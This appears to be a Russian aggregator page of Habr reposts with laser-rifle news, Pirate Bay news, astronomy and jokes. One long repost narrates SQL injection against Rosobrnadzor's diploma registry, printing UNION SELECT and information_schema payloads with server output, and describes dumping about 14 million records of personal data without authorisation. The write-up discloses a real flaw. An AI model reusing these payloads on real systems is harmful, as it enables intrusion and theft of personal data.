Svoboda | Graniru | BBC Russia | Golosameriki | Facebook

habr

Подписчиков: 8     Сообщений: 191     Рейтинг постов: 2,862.1

geek лазер китайцы оружие ружье habrahabr 

Китайцы представили лазерное ружье с дальнобойностью почти километр



geek,Прикольные гаджеты. Научный, инженерный и айтишный юмор,лазер,китайцы,оружие,ружье,habrahabr

Ученые из Сианьского института оптики и точной механики при Китайской академии наук анонсировали новую разработку — лазерное ружье ZKZM-500. По словам разработчиков, хотя оружие и относится к классу «нелетального», но энергии луча достаточно, чтобы вызвать мгновенное обугливание кожи и тканей. Всего лишь десять лет назад такая винтовка была лишь достоянием голливудских студий, а теперь это вполне реальное оружие. Инженеры, разрабатывавшие ружье, говорят, что луч без проблем поразит человека сквозь одежду. Более того, если ткань, из которой пошита одежда, легко воспламеняется, то человек в этой одежде может превратиться в живой факел. 


Ружье спроектировано таким образом, чтобы его можно было использовать в пешем походе, прикрепить к автомобилю или летательному аппарату. Вес ружья составляет 3 кг, примерно столько же весит автомат Калашникова АК-47. Сейчас китайцы решают вопрос о начале массового производства лазерного вооружения и предоставления его антитеррористическим командам и специальным подразделениям полиции.


Зарядов у винтовки будет более, чем достаточно. Ее аккумулятора (обычный перезаряжаемый Li-ion) хватит на 1000 выстрелов по 2 секунды каждый. Дальнобойность — 800 м. Прототип винтовки был построен на основе лазера ZKZM, разработанного ранее Сианьским университетом. Разработчики сейчас ищут партнера, у которого есть лицензия на производство оружия. Стоимость одной винтовки составляет около $15 000.





Развернуть

Отличный комментарий!

Гы, теперь террористы в китае будут косплеить моднячих диско-дэнсеров?
loveflame loveflame03.07.201821:15ссылка
+36.0

habrahabr комментарии 

Ветка обсуждений по теме: "Фермер из Курганской области собирался шпионить за коровой с помощью китайского GPS-трекера. Сотрудники ФСБ задержали его около почты с посылкой в руках."

О *
Germanets 07.06.18 в 10:20
«
Я
h
О
Одним из важных критериев для определения чем же является камера — спецсредством, или просто маленькой камерой является наличие вынесенного зрачка входа (PIN-HOLE).
Ну а вообще — покупая подобные вещи нужно лишний раз подумать, нельзя ли обойтись




Ссылка на комментарий.

Развернуть

взлом информационная безопасность sql длиннопост geektimes habrahabr текст много букв СНИЛС дыра ...story PostgreSQL obrnadzor инн рособрнадзор 

"И так сойдёт… или как данные 14 миллионов россиян оказались у меня в руках"

"https://habrahabr.ru/post/347760/"


Одиноким вечером, глядя на свою пустую зачётку и осознавая, что конец близок, я снова задумался о том, как бы мне сейчас собрать сумку, или даже просто рюкзак, положить туда рубашку, шорты и свалить в тёплую страну. Было бы хорошо, да вот с дипломом живётся намного лучше. Во всяком случае, мне всегда так говорят.

Также часто слышал много историй про людей, которые приходили на собеседования с красными дипломами МГУ, но при этом абсолютно не разбирались в своей специальности, а потом на корпоративах признавались, что диплом у них купленный.

Но времена сейчас другие, сейчас 21 век, век больших возможностей, любой работодатель, который умеет пользоваться мышкой и знает, как выглядит браузер на рабочем столе, может проверить данные диплома. Каждый диплом, который выдаётся учебным заведением, теперь регистрируется в едином реестре, доступ к которому есть у каждого через сайт Федеральной службы по надзору в сфере образования и науки.


ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ ОБРАЗОВАНИЯ И НАУКИ РОСОБРНАДЗОР,взлом,информационная безопасность,sql,PostgreSQL,длиннопост,geektimes,habrahabr,текст,Истории,obrnadzor,много букв,рособрнадзор,СНИЛС,инн,дыра



Для получение информации о документе об образовании достаточно просто заполнить форму, передвинуть слайдер и нажать кнопку. Вам либо покажут информацию о документе, либо скажут, что такого нет (но ещё рано обвинять соискателя в обмане, мало ли, что могло произойти).


Для поиска введите точные значения реквизитов, указанные на бланке документа: Более подробно о работе с данным сервисом можно ознакомиться по ссылке Уровень образования Не выбрано Уровна* обрио Наименование 00: Фамилия обладателя документа: Серия бланка: Номер бланка Дата выдачи: О Найти 00



Ну и пока я смотрел на эту форму, решил я с ней поиграться. Повводил всякой чепухи, и бац — на поле, в которое было введено 1', я получаю такой response:

<h2>Произошла ошибка</h2><p>SQLSTATE[42601]: Syntax error: 7 ERROR: syntax error at or near "4"LINE 6: ...me) = UPPER('1'')) AND (doc.education_level_id = '4') AND (U... ^</p>


Голый SQL Injection. Очевидно, что задачи продумать обработку ошибок перед разработчиком не было. Задача была сделать сервис, который работает. Сервис, который является гарантом. Так одинокий вечер превратился в весёлую одинокую ночь.


Ещё будучи подростком я очень любил всякие крутые истории про хакеров, а после того, как решил заняться программированием, изредка почитывал и интересные статьи по взлому и прочему. Так что то, что нужно делать дальше — я знал.

Так как разработчик этого сервиса дал нам удовольствие видеть ещё и часть запроса, то мы можем с уверенностью предположить, что это SELECT запрос. Теперь нам нужно как-то обнулить действие запроса, записанного в php-скрипте, а потом с помощью переменной вставить свой.

Для обнуления запроса достаточно просто добавить невозможное условие и закомментировать последующие строки запроса, что-то наподобие:

Инъекция

...me) = UPPER('1') AND (1=0)) — ')) AND (doc.education_level_id = '4') AND (U…


В ответ просто пришло сообщение о том, что документ не найден.

Также пробовал использовать вместо невозможного условия, наоборот, очевидные. А именно пробовал искать какой-либо документ по id. Писал id=1, id=1024 и прочее, но результатов не дало. Видимо, id давно перевалило за тысячи (спойлер: за миллионы).

Также я совершенно не надеялся на то, что запрос придёт без ошибки. Я был уверен, что пробелы будут экранироваться, удаляться, запрещаться, ещё что-нибудь. Ведь в форме на странице поиска ввести фамилию с пробелами невозможно. Но всё оказалось в разы проще.

Ну а теперь бы хотелось вытащить что-то действительно интересное. Изменить структуру ответа мы не можем никак, то есть если в запросе были, например, SELECT id, name, count, то так оно и останется. Значит надо подстраиваться, а для начала понять, какие же данные запрашиваются из БД, и, главное, сколько? Существует много способов узнать количество полей, но мне помог только ORDER BY. Как это работает?

ORDER BY сделан для сортировки, но его синтаксис не требует обязательно указывать имя поля, достаточно указать его позицию в запросе. Если указать номер позиции больше, чем количество запрашиваемых полей — то будет ошибка. Методом перебора можно подобрать количество полей. Их оказалось 55.

Хочется понять, с чем же мы работаем, что это за база данных такая? Предположим, что это MySQL, в MySQL есть функция Version(), которая возвращает версию БД. Применим:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,version(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…


В ответ пришёл JSON, в котором было:

PostgreSQL 9.1.2 on x86_64-alt-linux-gnu, compiled by x86_64-alt-linux-gcc (GCC) 4.5.3 20120111 (ALT Linux 4.5.3-alt1.M60C.1), 64-bit
Отлично, мы знаем систему, версию БД (под неё вроде даже эксплоиты были). Поле для действия расширилось. Узнаём, как выглядит запрос:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,current_query(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…


Ответ:
"SELECT "doc".*, "doc_type"."type", "stat"."name" AS "status", "level"."name" AS "level", "rec"."name" AS "rec_name", "rec"."surname" AS "rec_surname", "rec"."patronymic" AS "rec_lastname" FROM "documents" AS "doc" LEFT JOIN "document_types" AS "doc_type" ON doc_type.id = doc.document_type_id LEFT JOIN "document_packages" AS "dp" ON doc.document_package_id = dp.id LEFT JOIN "documents_status" AS "stat" ON stat.id = doc.status_id LEFT JOIN "education_levels" AS "level" ON level.id = doc.education_level_id LEFT JOIN "recipients" AS "rec" ON rec.id = doc.recipient_id WHERE (dp.status = 3) AND (doc.organization_id = '573') AND (doc.year = '2018-01-01') AND (UPPER(rec.surname) = UPPER('1')) UNION SELECT 1,current_query(),'3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '01.01.1970', '01.01.1970', '21', '01.01.1970', '23', '24', '25', '26', '01.01.1970', '28', '29', '30', '31', '32', '33', '28-05-2004 11:11:59', '35', '36', '28-05-2004 11:11:59', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55' -- ')) AND (doc.education_level_id = '4') AND (UPPER(doc.series) = UPPER('1')) AND (doc.number = '1') LIMIT 1"

Вся картина перед нами.

Попробуем узнать, что же за таблицы есть во всей базе данных:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,table_name,тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.tables — ')) AND (doc.education_level_id = '4') AND (U…


Таким образом получили все таблицы. Узнаём столбцы каждой таблицы следующим образом:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,CONCAT(column_name,' ',data_type,' ',is_nullable),тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.columns WHERE table_name='Какое-то имя таблицы' — ')) AND (doc.education_level_id = '4') AND (U…


Итак, зная структуру базы данных, я написал скрипт на Питон и выкачал все самые интересные на мой взгляд данные. А именно:

Таблицу с дипломами об образовании (серия, номер, год поступления, год окончания, СНИЛС!, ИНН!!, серия и номер паспорта (честно говоря, у всех записей поля пустые, но сам факт!), дата рождения, национальность (зачем?), учебная организация, выдавшая документ), таблицу с гражданами с образованием (там всё проще: ФИО и всё), таблицу с пользователями системы (стандартно, логин, email, и, НЕОЖИДАНО, md5 хэш пароля, хоть не сам пароль), отдельная таблица admin с одной записью (так же: логин, хэш пароля и прочее), таблица с информацией об учебных заведениях (кто начальник, email, телефон, лицензия — в общем всё, что и так есть в открытом доступе) и ещё кучу вспомогательных таблиц.

По объёмам получилось: около 14 000 000 документов об образовании, около 14 000 000 записей с данными о бывших студентах, 1322 пользователя системы, 1 админ, который логинится по будням в системе, видимо, когда на работу приходит, 3391 учебное заведение и горы непонятной информации типа ОКОГУ и прочее. База весом 5 гб.

А теперь представьте, сколько времени это качалось. Вы думаете, кто-то заметил? Может быть сервис резко отключился, ip заблокировали или ещё что-то? НЕТ!

Конечно, целью не является использовать эту информацию в корыстных целях (да я и не представляю, как). Иначе бы я не писал статью здесь. Но и писать лично администрации сайта или кто там за него отвечает я тоже не горю желанием, хватило истории про Микротех.

Дополнительно решил проверить хэши по радужным таблицам. Не уверен, конечно, что они хэшировались именно голым md5, но, во всяком случае, в открытых базах данных совпадений ни к одному хэшу не нашлось. Или я что-то не умею.

Мог бы я продолжить и получить доступ в систему? Смог бы я сам изменять записи и добавлять свои? Вполне возможно, но я решил этого не делать. Да и сессию надо закрывать, без диплома-то никак…


Развернуть

картинка с текстом хабр собеседование Буквы на белом фоне 

Случай на собеседовании в саппорт: - И последнее задание. Закончите строчку: «Этот парень был из тех... - ...поддержки». - Вы приняты.,картинка с текстом,хабр,собеседование,Буквы на белом фоне
Развернуть

хабрахабр информационная безопасность 

На хабре выложили статью о программе, контролирующей доступ к резиденции президента. Вы хотите сплавать к путину в гости?

http://habrahabr.ru/post/273249/
хабрахабр,информационная безопасность
Развернуть

комментарии хабр алкоголизм я не умею ставить теги песочница 

(|) Мек1оп 2 сентября 2015 в 20:51 # +1 ‘ц’ ^ Вспомнил, как травил осиное гнездо сиропом с дрожжами. Осы на лапах грибок притащили в соты и все. Красивое брожение. Правда мне потом стало лень хщать кончины взрослых особей и я сжёг все нафиг напалмом. ^ 2 сентября 2015 в 23:12 # *1 Т 0 “Ц“ А вы
Развернуть

осциллограф как нарисовать хабрахабр песочница 

Как нарисовать осциллограф 1. Рисуем кубик 2. Дорисовываем детальки,осциллограф,как нарисовать,хабрахабр,песочница
сама статья здесь - http://habrahabr.ru/company/mailru/blog/247983/
Развернуть

Роскомнадзор FakeFactFelis habrahabr троллинг 

Замглавы Роскомнадзора избежал исполнения закона о блогерах?

^0 Twitter / ? ^ С I Q Twitter, Inc. [US] I https://twitter.com/mksenzov = Home Sorry, that page doesn’t exist! You can search TWitter using the search box below or return to the homepage mksenzov Search Dansk Deutsch English EngiishUK Español Suomi Filipino français Bahasa Indonesia

Согласно российскому закодательству, владелец блога с более, чем 3000 подписчиками, должен зарегистрироваться в Роскомнадзоре и соблюдать ряд ограничений, к примеру, не материться.

Алексей Венедиктов предложил добить до нужного числа счётчик подписчиков твитера Максима Ксензова, заместителя главы РКН.

В последние дни аккаунт @mksenzov действительно начал быстро набирать фолловеров. Но исполнения законных обязанностей не случилось — аккаунт был удалён.

Каких-либо комментариев на странице Ксензова или в аккаунтахРоскомнадзора пока не было. В профиле «ВКонтакте» замглавы РКН всё ещё указан нерабочий Twitter-аккаунт @mksenzov.

Развернуть

the pirate bay FakeFactFelis habrahabr 

Возможно, будет лучше, если The Pirate Bay уйдёт в оффлайн навсегда

интернет,the pirate bay,FakeFactFelis,habrahabr

Вчера крупнейший в мире каталог для поиска BitTorrent-файлов The Pirate Bay был отключён. Как выяснилось через несколько часов после прекращения работы, 9 декабря шведская полиция нанесла визит в дата-центр «Пиратской бухты» и изъяла некоторое количество оборудования, включая компьютеры и серверы.

The Pirate Bay до сих пор не работает. Его операторам не привыкать к крупномасштабным правовым преследованиям. Но один из основателей «Пайрат бэя» выразил сомнение в возможности возобновления функционирования сайта.

Петер Сунде (известный также по своему никнейму brokep) совсем недавно — 10 ноября 2014 года — вышел на свободу после отбытия в тюрьме 5 месяцев по делу The Pirate Bay. Сегодня он не играет такой большой роли в жизни ресурса.

Бывший представитель самого непокорного битторрент-сайта галактики вспомнил последний рейд полиции 8 лет назад. Вызван он был давлением киноиндустрии, за облавой стояла Американская ассоциация кинокомпаний (MPAA). Что послужило поводом в этот раз, пока неизвестно.

В 2006 году налёт привёл к уличным демонстрациям и протесту со стороны множества людей. Сегодня, по его словам, мало кто взволнован, люди воспринимают сайт как должное.

Сунде заявил, что TPB практически не развивается, никто не улучшает его старый движок, полный багов. Единственное, что претерпевает изменения — это реклама, которой на сайте всё больше и больше.


интернет,the pirate bay,FakeFactFelis,habrahabr

Изначально планировалось закрыть The Pirate Bay на его десятый день рождения. Вместо этого в Стокгольме в 2013 году была устроена шумная вечеринка с платным входом. Как описывает Сунде, какая-то компания прислала полуголых девиц, которые привлекали потенциальных клиентов раздачами промо-материалов.

Сунде говорит, что за последние годы из The Pirate Bay ушла изначальная «душевная» команда, а новые сотрудники не отличаются большим энтузиазмом. Сунде не почувствовал в новичках никакого интереса в помощи сообществу, если только это не сулит денежное вознаграждение.

На протяжении лет Сунде сознательно и безуспешно пытался нарушить имидж The Pirate Bay, поскольку ему казалось, что люди слишком сильно преклоняются ресурсу. Большой промо-блок на главной странице для музыкантов, который добавила новая команда, сооснователь сайта назвал попыткой поддержать образ, а не реальным действием.

Сунде надеется, что сайт закрылся навсегда, а интернет-пользователи смогут создать что-то новое и без рекламы, что-то лучше, быстрее, надёжней и без возможности разложиться; то, во что будет заложена идея, которая будет поддерживаться.

Легко увидеть в его словах оторванность от реальности: за восемь лет на The Pirate Bay многое изменилось. Сегодня используются magnet-ссылки, что означает, что на серверах не хранится почти ничего. Индекс со всеми файлами умещается в 90 мегабайт, это позволяет развернуть собственную версию самостоятельно.

Впрочем, 90-мегабайтный проект не обновлялся с 2013 года, а для его создания приходилось учитывать особенности работы анти-DDoS системы: IP-адрес выкачивающего блокировался почти 10 раз.

Реклама же требовалась для трат на юридическую защиту деятельности сайта, а это стоит больших денег.

О серьёзности текущих событий можно судить по вовлечённости шефа национальной полиции Швеции и по некоторым заявлениям властей. Согласно информации сайта TorrentFreak, как минимум один человек был задержан.

Сейчас местами появляются новые зеркала сайта, но все они зависят от оригинала. Чаще всего упоминают копию доменной зоны Коста-Рики. Конечно же, это не самостоятельный сайт — ThePirateBay.cr указан в списке зеркал. Некоторые даже начали продавать футболки и прочий мерчендайз с названием зеркала, словно сайт переехал на этот домен.

Сохраняется негативная тенденция: вместе с The Pirate Bay в оффлайн ушли EZTV, Torrage, Zoink, Istole и форум Suprbay.org. Уже давно не работает самый большой трекер мира OpenBitTorrent.

Неизвестно, планируют ли текущие операторы сайта возобновить работу. Технически это возможно, поскольку The Pirate Bay обладает распределённой структурой. Считается, что его сервера расположены во множестве стран. Состоявшийся рейд позволит увидеть, так ли это на самом деле.

Развернуть

Визуализация данных космонавтика наука habrahabr песочница 

Астрофизики построили трехмерную визуализацию нашего суперкластера

Визуализация данных,космонавтика,наука,habrahabr,песочница

Объединенная команда астрофизиков из Франции, Израиля и США создали трехмерную визуализацию локального суперкластера, куда входит и наша Галактика. Сам суперкластер был назван Laniakea, что означает «Неизмеримые небеса» на гавайском (кстати, есть нечто схожее с «Лалангаменой» — есть такой НФ рассказ и сборник НФ произведений, если не читали, рекомендую).



Диаметр сечения суперкластера составляет 160 мегапарсек, это в несколько тысяч раз больше, чем диаметр Млечного пути. А масса такого образования более, чем в сто тысяч раз превышает массу нашей Галактики. «Небеса» включают в себя около 100 тысяч галактик.

Визуализация данных,космонавтика,наука,habrahabr,песочница




Для работы ученые использовали наиболее крупный каталог галактик, получивший название Cosmicflows-2 Благодаря этому ресурсу и его базе данных удалось смоделировать суперкластер, основываясь на информации о движении тысяч галактик, входящих в Laniakea.



Специалисты отмечают, что в Laniakea гораздо больше галактик, чем использовано в модели, но, к сожалению, даже в таком полном каталоге, как Cosmicflows-2 нет данных о тысячах других галактик. «Небеса» соседствуют с четырьмя другими суперкластерами, известными, как Шепли (Shapley), Геркулес (Hercules), Coma и Персей-Рыбы.


http://habrahabr.ru/post/235559/

Развернуть
В этом разделе мы собираем самые смешные приколы (комиксы и картинки) по теме habr (+191 картинка, рейтинг 2,862.1 - habr)